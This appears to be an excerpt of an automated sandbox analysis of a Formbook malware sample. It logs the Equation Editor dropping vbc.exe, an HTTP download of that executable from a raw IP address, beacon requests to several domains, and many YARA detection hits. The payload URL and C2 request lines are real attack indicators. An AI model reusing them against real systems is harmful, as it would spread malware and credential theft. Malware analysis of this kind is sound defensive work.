Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.59

Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.494238454.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: global traffic	HTTP traffic detected: GET /1155/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.59Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above 21 ^ 22 23 24 m. 25 m 26 27 m 28 29 ' 30 3

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E18B0	4_2_002E18B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E03E4	4_2_002E03E4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E1BC2	4_2_002E1BC2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E04A8	4_2_002E04A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E07C6	4_2_002E07C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E0812	4_2_002E0812
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E1951	4_2_002E1951
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9A50	4_2_002E9A50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9CA9	4_2_002E9CA9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9CB8	4_2_002E9CB8
